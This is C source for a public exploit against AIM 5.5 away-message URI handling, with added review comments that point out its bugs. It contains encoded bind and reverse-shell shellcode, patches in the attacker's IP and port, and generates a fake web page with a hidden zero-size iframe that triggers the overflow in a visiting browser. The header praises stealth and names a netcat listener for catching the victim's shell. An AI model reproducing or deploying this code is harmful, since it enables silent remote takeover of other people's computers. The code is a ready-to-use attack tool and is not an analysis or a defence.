
  1. /*
  2.  * AIM Away Message Buffer Overflow Exploit
  3.  *   Exploit by John Bissell A.K.A. HighT1mes
  4.  *
  5.  * Exploit: 
  6.  * ========
  7.  *   drizzit.c
  8.  *
  9.  * Vulnerable Software:
  10.  * ====================
  11.  *    - AIM 5.5.3588
  12.  *    - AIM 5.5.3590 Beta
  13.  *    - AIM 5.5.3591
  14.  *    - AIM 5.5.3595
  15.  *    and a couple others versions...
  16.  *
 * If you want to try other return addresses for other versions of
 * AIM then edit the return address.. But the current one embedded
 * will work for sure with all the AIM versions listed above.
  20.  *
  21.  * I used some of the metasploit shellcode for this exploit with some
  22.  * modifications to get this into stealth mode so it is harder to 
  23.  * detect the attack. Since I'm using metasploit shellcode that means this
  24.  * exploit can be used on any NT type OS, like win2k, winnt, winxp across
  25.  * any service pack.. I don't know about SP2 though I haven't tested
  26.  * it yet.
  27.  *
 * On a side note I purposely did not include the download+exec shellcode
  29.  * even though I have it because I'm sick and tired of these little
  30.  * spam/adware bitchs messing peoples computers up for profit.. You can
  31.  * still download/upload through the shell to the victim. It just 
  32.  * isn't automated like download+exec would be.
  33.  *
  34.  * In my opinion the reverse connect (-r option) is the most dangerous
  35.  * because you can encode your ip address and pick a port, and then 
  36.  * when the victim visits the evil web page or email whatever.. then the
  37.  * attack will automatically open his AIM even its not already open and
  38.  * connect to you and then terminate the AIM process to be stealth so
 * the victim doesn't know what hit them.. As I remind people in the
  40.  * exploit usage you need to remember to use netcat to listen on a 
  41.  * port you picked for the exploit to connect to...
  42.  *
  43.  * One reason I decided to include the generation of html code for 
 * this exploit is I noticed almost no one puts small limits on the
  45.  * <IFRAME SRC=""> attribute. So when the victim connects to that
  46.  * page or reads that email depending on the browser or client, 
  47.  * The exploit will execute.. IE 6.0 and Mozilla are 
  48.  * affected by this problem as well as Outlook Express when the
  49.  * security settings are set to the Internet Zone.
  50.  *
  51.  * Excuse the sloppy commandline interface I just wanted to get
  52.  * this out to the public. 
  53.  *
  54.  * [ Original advisory posted by Secunia and iDEFENSE. ]
  55.  *
  56.  * Greets:
  57.  * =======
  58.  *   IsolationX, YpCat, DaPhire, route, #romhack,
  59.  *   Taylor Hayes, Aria Giovanni, Anthony Rocha,
  60.  *   InVerse, Deltaflame, Jenna Jameson, iDENFENSE, 
  61.  *   secunia, so1o, John Kerry, and many others...
  62.  *
  63.  * Compiler: 
  64.  * =========
  65.  *    Visual C++ 6.0
  66.  *
  67.  * To compile you first must add ws2_32.lib to the Object/librarys modules:
  68.  * text box under the Project -> Settings menu; then click on the link tab...
  69.  */
  70.  
  71. #include <stdio.h>
  72. #include <stdlib.h>
  73. #include <string.h>
  74. #include <windows.h>
  75.  
  76. /* Exploit Data */
  77.  
/*
 * Trigger string: the bytes spell "aim:goaway?message=" followed by a long
 * run of 0x41 ('A') padding.  main() copies this into the exploit buffer and
 * appends one of the payload arrays after it.
 *
 * Detection note: an aim:goaway?message= URI carrying hundreds of identical
 * filler bytes inside a 0x0 iframe (the HTML main() writes) is a static
 * signature of this tool's output.
 */
char injection_vector[] =

                        "\x61\x69\x6D\x3A\x67\x6F\x61\x77\x61\x79\x3F\x6D\x65\x73\x73\x61"
                        "\x67\x65\x3D\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41";
  145.  
  146. char bind_shellcode[] = 
  147.  
  148.                         "\xEB\x26\x23\x38\x3B\x41\x41"
  149.                         "\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34\x24\x58\x58\x58"
  150.                         "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
  151.                         "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
  152.                         "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
  153.                         "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
  154.                         "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
  155.                         "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
  156.                         "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
  157.                         "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
  158.                         "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
  159.                         "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
  160.                         "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
  161.                         "\xA3\x6D\xC5\xC5\xFA\x90\x92\xB0\x83\x1B\x74\xF8\x82\xC4\xC1\x6D"
  162.                         "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
  163.                         "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
  164.                         "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
  165.                         "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
  166.                         "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
  167.                         "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
  168.                         "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
  169.                         "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
  170.                         "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
  171.                         "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
  172.                         "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
  173.                         "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
  174.  
  175. char reverse_shellcode[] =
  176.                          
  177.                         "\xEB\x08\x41\x41\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34"
  178.                         "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
  179.                         "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
  180.                         "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
  181.                         "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
  182.                         "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
  183.                         "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
  184.                         "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
  185.                         "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
  186.                         "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
  187.                         "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
  188.                         "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
  189.                         "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
  190.                         "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
  191.                         "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
  192.                         "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
  193.                         "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
  194.                         "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
  195.                         "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
  196.                         "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
  197.                         "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
  198.                         "\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
  199.                         "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
  200.                         "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
  201.  
  202. /* Function Prototypes */
  203.  
/* Prints the banner and usage text, then calls exit(-1); it never returns. */
void print_usage(char *prog_name);
/* XORs one byte with the constant 0x92; main() applies it to the port bytes
 * and IP octets before patching them into a payload array. */
unsigned char xor_data(unsigned char byte);
  206.  
  207. /* Function Code */
  208.  
/*
 * Entry point.  Parses the command line, patches the selected payload array
 * with the port (and, for -r, the four IPv4 octets), and emits the resulting
 * aim: URI either raw on stdout (-o) or wrapped in a minimal HTML page whose
 * 0x0 iframe points at the URI (-e outfile).
 *
 * Review notes (code left unchanged):
 *  - Every option that takes a value reads argv[i+1] without checking
 *    i+1 < argc, so a trailing -r/-p/-e reads past the end of argv.
 *  - strncpy() with a fixed count never guarantees a terminator here:
 *    ip_addr, outfile and str_num can be left unterminated, and the later
 *    strchr()/atoi()/fopen() then read uninitialized stack bytes.
 *  - outfile is set only by -e; with neither -e nor -o, fopen() is called
 *    on an uninitialized buffer.
 *  - No input validation: the port goes through atoi() unchecked and there
 *    is no IPv4 syntax check, so a strchr() returning NULL makes the pointer
 *    arithmetic in the -r branch undefined.
 *  - encoded_ip is declared but never used.
 *  - Error paths exit(-1); the normal path returns EXIT_SUCCESS.
 */
int main(int argc, char *argv[])
{
        int i                           = 0;
        int raw_num                     = 0;
        unsigned long port              = 1337; /* default port for bind and reverse attacks */
        unsigned long encoded_port      = 0;
        unsigned long encoded_ip        = 0;    /* unused */
        unsigned char print_raw_exploit = 0;    /* 1 => -o: write the URI to stdout */
        unsigned char attack_mode       = 2;    /* bind attack by default */
        char ip_addr[256];                      /* -r argument; only 20 bytes are ever copied in, never terminated */
        char exploit[2048];                     /* injection_vector + payload; size is not checked below */
        char str_num[16];                       /* scratch for one dotted-quad octet; no bound check on the copies */
        char *p1, *p2;
        FILE *EXPLOIT_FP;
        char outfile[512];                      /* -e argument; uninitialized unless -e is given */
        WSADATA wsa;




        /* print_usage() calls exit(), so it does not return. */
        if (argc < 2) print_usage(argv[0]);

        /* process commandline */
        /* Scans every argv entry, including argv[0].  Each value-taking option
         * reads argv[i+1] with no bound check against argc. */
        for (i = 0; i < argc; i++) {
                if (argv[i][0] == '-') {
                        switch (argv[i][1]) {
                        case 'r':
                                /* reverse connect */
                                /* Copies at most 20 bytes and adds no terminator;
                                 * the rest of ip_addr stays uninitialized. */
                                strncpy(ip_addr, argv[i+1], 20);
                                attack_mode = 1;
                                break;
                        case 'b':
                                /* bind */
                                attack_mode = 2;
                                break;
                        case 'p':
                                /* atoi() reports no errors; non-numeric or out-of-range input is not detected. */
                                port = atoi(argv[i+1]);
                                /* port */
                                break;
                        case 'o':
                                print_raw_exploit = 1;
                                break;
                        case 'e':
                                /* Same unterminated-copy issue as ip_addr; no default case. */
                                strncpy(outfile, argv[i+1], 256);
                        }
                }
        }

  /* initialize the socket library */
  /* Only htonl() is used from Winsock.  WSAStartup() returns 0 or a WSA error
   * code, not SOCKET_ERROR, so this comparison never detects a failed init. */
  if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
    printf("Error: Winsock didn't initialize!\n");
    exit(-1);
  }

        /* build exploit */
        /* Copies exactly strlen() bytes (no terminator), then zeroes index
         * strlen()+1.  Index strlen() itself is never written, so the byte
         * at which strncat() below stops is whatever was on the stack. */
        strncpy(exploit, injection_vector, strlen(injection_vector));
        exploit[strlen(injection_vector)+1]=0; // intended terminator; off by one (see note above)
        encoded_port = htonl(port);
        encoded_port += 2;      /* +2 adjustment: intent not documented in the source */
        if (attack_mode == 1) {
                /* reverse connect attack */
                /* Port bytes go into entries 196-199 (two fixed bytes plus the
                 * two XOR-encoded high bytes of encoded_port). */
                reverse_shellcode[196] = (char) 0x90;
        reverse_shellcode[197] = (char) 0x92;
                reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
                reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));

                /* Split ip_addr on '.' and store each octet XOR-encoded in
                 * entries 191-194.  Each strncpy() count is a pointer
                 * difference with no bound against sizeof str_num (16) and no
                 * terminator; strchr() returning NULL is not handled. */
                p1 = strchr(ip_addr, '.');
                strncpy(str_num, ip_addr, p1-ip_addr);
                raw_num = atoi(str_num);
                reverse_shellcode[191] = xor_data((char)raw_num);

                p2 = strchr(p1+1, '.');
                strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
                raw_num = atoi(str_num);
                reverse_shellcode[192] = xor_data((char)raw_num);

                p1 = strchr(p2+1, '.');
                strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
                raw_num = atoi(str_num);
                reverse_shellcode[193] = xor_data((char)raw_num);

                p2 = strrchr(ip_addr, '.');
                strncpy(str_num, p2+1, 5);
                raw_num = atoi(str_num);
                reverse_shellcode[194] = xor_data((char)raw_num);

                /* sizeof includes the array's trailing NUL; exploit[2048] is not bounds-checked. */
                strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
        }
        if (attack_mode == 2) {
                /* bind attack */
                /* Same port patching as above, at entries 204-207. */
                bind_shellcode[204] = (char) 0x90;
        bind_shellcode[205] = (char) 0x92;
                bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
                bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));
                strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
        }

        WSACleanup();

        /* output exploit */
        if (print_raw_exploit == 1) {
                printf("%s", exploit);
        }
        else {
                /* outfile may be uninitialized or unterminated here (see notes above). */
                if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
                        fprintf(stderr, "Error: Exploit file can't be created!\n");
                        exit(-1);
                }

                /* The URI is written verbatim into the src attribute; the final
                 * tag is written as <html> where </html> was presumably meant. */
                fprintf(EXPLOIT_FP, "<html>\n");
                fprintf(EXPLOIT_FP, "<head>\n");
                fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>\n");
                fprintf(EXPLOIT_FP, "</head>\n");
                fprintf(EXPLOIT_FP, "<body>\n");
                fprintf(EXPLOIT_FP, "Some fake web page or email...\n");
                fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src=\"");
                fprintf(EXPLOIT_FP, "%s", exploit);
                fprintf(EXPLOIT_FP, "\">\n</iframe>\n");
                fprintf(EXPLOIT_FP, "</body>\n");
                fprintf(EXPLOIT_FP, "<html>\n");

                /* Return value of fclose() (which flushes the write stream) is not checked. */
                fclose(EXPLOIT_FP);

                /* im to lazy to make a macro for this banner :P */
                printf(" +-------------------------------------------------+\n");
                printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
                printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
                printf(" +-------------------------------------------------+\n\n");

                printf(" Exploit created!\n\n");

                printf(" Remember if you use the -r option to have netcat listening\n");
                printf(" on the port you are using for the attack so the victim will\n");
                printf(" be able to connect to you when exploited...\n\n");
                printf(" Example:\n");
                /* %d with an unsigned long argument is a mismatched format specifier (%lu would match). */
                printf("\tnc.exe -l -p %d", port);
        }

        return(EXIT_SUCCESS);
}
  349.  
/*
 * Prints the banner, option descriptions and examples, then terminates the
 * process with exit(-1).  Called from main() when argc < 2.
 *
 * @param prog_name  argv[0], substituted into the usage and example lines.
 *
 * Review note: the long literal in the -o/-e description is split across a
 * line break ("different" / "ways.") without a continuation backslash, which
 * does not compile as shown; the backslash may have been lost when the file
 * was rendered — confirm against the original source.
 */
void print_usage(char *prog_name)
{
        printf(" +-------------------------------------------------+\n");
        printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
        printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
        printf(" +-------------------------------------------------+\n\n");
        printf(" Exploit Usage:\n");
        printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
        printf(" Parameters:\n");
        printf("\t-r your_ip or -b\t Choose -r for reverse connect attack\
 mode\n\t\t\t\t and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or\
 -b then a bind\n\t\t\t\t attack will be generated.\n\n");
        printf("\t-p (optional)\t\t This option will allow you to change the port\
 \n\t\t\t\t used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind then\
  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode is reverse connect\
  then the port you\n\t\t\t\t specify will be the one you want to listen\n\t\t\t\t on so the victim can\
  connect to you\n\t\t\t\t right away.\n\n");
        printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If you would like\
 output go straight to\n\t\t\t\t standerd output then specify the -o option\n\t\t\t\t otherwise give the\
 path of where you want to\n\t\t\t\t create the exploit file which is basically\n\t\t\t\t a simple html\
 file. The -o option is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different
ways.\n\n");
        printf(" Examples:\n");
        printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
        printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
        printf("\t%s -b -o\n", prog_name);
        printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);
        printf(" Remember if you use the -r option to have netcat listening\n");
        printf(" on the port you are using for the attack so the victim will\n");
        printf(" be able to connect to you when exploited...\n\n");
        printf(" Example:\n");
        printf("\tnc.exe -l -p 8888");
        /* Usage is treated as an error: non-zero exit, no return to the caller. */
        exit(-1);
}
  384.  
/*
 * XOR one byte with the fixed key 0x92.
 *
 * main() runs the port bytes and (for -r) each IPv4 octet through this
 * before storing them into a payload array.  XOR with a constant is its own
 * inverse, so xor_data(xor_data(b)) == b for every b.
 *
 * @param byte  value to encode
 * @return      byte ^ 0x92
 */
unsigned char xor_data(unsigned char byte)
{
        const unsigned char key = 0x92;
        unsigned char encoded = byte ^ key;

        return encoded;
}
  389.